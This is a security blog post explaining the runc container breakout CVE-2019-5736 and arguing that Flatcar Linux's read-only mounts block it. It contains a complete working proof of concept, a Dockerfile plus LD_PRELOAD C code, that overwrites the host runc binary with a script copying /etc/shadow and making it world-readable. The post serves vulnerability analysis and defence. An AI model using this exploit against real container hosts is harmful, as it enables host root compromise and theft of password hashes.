runc “breakout” Vulnerability Mitigated on Flatcar Linux

Last week, a high severity vulnerability was disclosed by the maintainers of runc, under the name CVE-2019-5736: runc container breakout. This vulnerability has high severity (CVSS score 7.2) because it allows a malicious container to overwrite the host runc binary and gain root privileges on the host. According to our research, however, when using Flatcar Linux with its read-only filesystems this vulnerability is not exploitable.

runc vulnerability background

In the context of our security work, we had been asked to evaluate the report’s severity with respect to the client’s installation. In the course of this evaluation, we wrote an exploit in order to understand how it works and to test if their installation was vulnerable. While we did recognize the severity of the issue, we also ascertained that the client was not affected. To understand this, let’s take a look at how things should work versus what could happen if the exploit was successfully executed.

How containers should work

Let’s first look at the following diagram showing how runc should work.

runc forks a new process that becomes the pid1 of the container. Following the traditional fork/exec Unix model, that process is so far only a copy of the parent process and therefore still runs the “runc” program. /proc/self/exe points to runc while running in the container.

Then, pid1 will execute the entrypoint in the container, meaning the program running will be substituted to the program in the container.

How our runc exploit works

The runc exploit code changes the normal behaviour in the following ways

Instead of executing our own program in the container, we set the entrypoint to /proc/self/exe, meaning runc will run runc again. So /proc/1/exe will be a reference to runc for a longer time.
However, we don’t want to run the runc code. With LD_PRELOAD, we will execute a routine that will sleep for a few seconds in order to keep the reference /proc/1/exe for the next step.
During those few seconds, we have enough time to enter the container with runc exec and open a reference to /proc/1/exe, while it is still pointing to runc (file descriptor 10 in our exploit).
At this point, we cannot open runc in read-write mode because pid1 is still running runc. We would get the error “text busy” if we tried.
The sleep in pid1 terminates and executes something else (another sleep but via /bin/sh so pid1 does not lock runc).
Finally, we have a temporary read-only file descriptor to the runc binary on the host filesystem and we use tee /proc/self/fd/10 to acquire a new file descriptor in write mode and to overwrite the runc binary.

Our exploit container image is simply a LD_PRELOAD program:

FROM fedora:latest
RUN ln -s /proc/self/exe /exe
RUN dnf install -y gcc
RUN mkdir -p /src
COPY foo.c /
RUN gcc -Wall -o /foo.so -shared -fPIC /foo.c -ldl
ENV LD_PRELOAD=/foo.so
CMD [ "/usr/bin/sh" ]

Here is the source code:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dlfcn.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

static void __myinit(void) __attribute__((constructor));
static void __myinit(void)
{
  int pid;
  unsetenv("LD_PRELOAD");

  pid = getpid();
  if (pid == 1) {
    printf("I am pid 1. Sleeping 3 seconds...\n");
    sleep(3);
    printf("I am pid 1. Sleeping forever...\n");
    execl("/bin/sh", "sh", "-c",
          "/bin/sleep 1000",
          (char *) 0);
    exit(0);
  }

  printf("I am pid %d. Starting Hijack...\n", pid);
  execl("/bin/sh", "sh", "-c",
        "exec 10< /proc/1/exe ; "
        "echo Lookup inode of /proc/1/exe: ; "
        "stat -L --format=%i /proc/1/exe ; "
        "echo sleep 4 ; "
        "sleep 4 ; "
        "printf '#!/bin/sh\\ncp /etc/shadow /home/ubuntu/\\nchmod 444 /home/ubuntu/shadow\\n' | tee /proc/self/fd/10 > /dev/null ; "
        "echo done ; ",
        (char *) 0);

  exit(0);
}

This program is a single function compiled into foo.so, loaded via the environment variable $LD_PRELOAD. It will be executed both as the initial process in the container (pid 1) and whenever entering in the container with docker exec. If it’s running as pid 1 (if (pid == 1)), it will run the red part of the diagram above. If it’s running via docker enter, it will run the bottom part of the diagram above.

Running the exploit on Ubuntu

When trying this on Ubuntu, we can overwrite runc on the host.

When executing the exploit, /usr/bin/docker-runc is overwritten by the malicious script that copies the password file /etc/shadow from the host, making it available for others to read.

Trying the exploit on Flatcar Linux

Then, we tried the same exploit on Flatcar Linux and we couldn’t reach the same result.

Flatcar Linux mounts /usr in read-only mode, protecting most programs from being overwritten. However, this test does not use runc from /usr/bin/runc but from /run/torcx/unpack/docker/bin/runc (managed by torcx). But torcx also uses a read-only mount for the programs, so it is protected the same way.

Conclusion

As we have demonstrated, the read-only filesystems feature of Flatcar Linux is capable of mitigating this runc vulnerability. It can also help against similar exploits of this class. In addition, Flatcar Linux delivers updates automatically, including security fixes. These are some of the reasons we are pushing Flatcar Linux forward and using it as the base for our upcoming open source products.

Since developing our own exploit, the researchers who found this vulnerability and the maintainers of runc also published their exploit, working in a similar way:

If you want to learn more about Flatcar Linux, head over to flatcar-linux.org.

If you need help with security assessments, penetration testing, or engineering services contact us at [email protected].

runc vulnerability background​

How containers should work​

How our runc exploit works​

Running the exploit on Ubuntu​

Trying the exploit on Flatcar Linux​

Conclusion​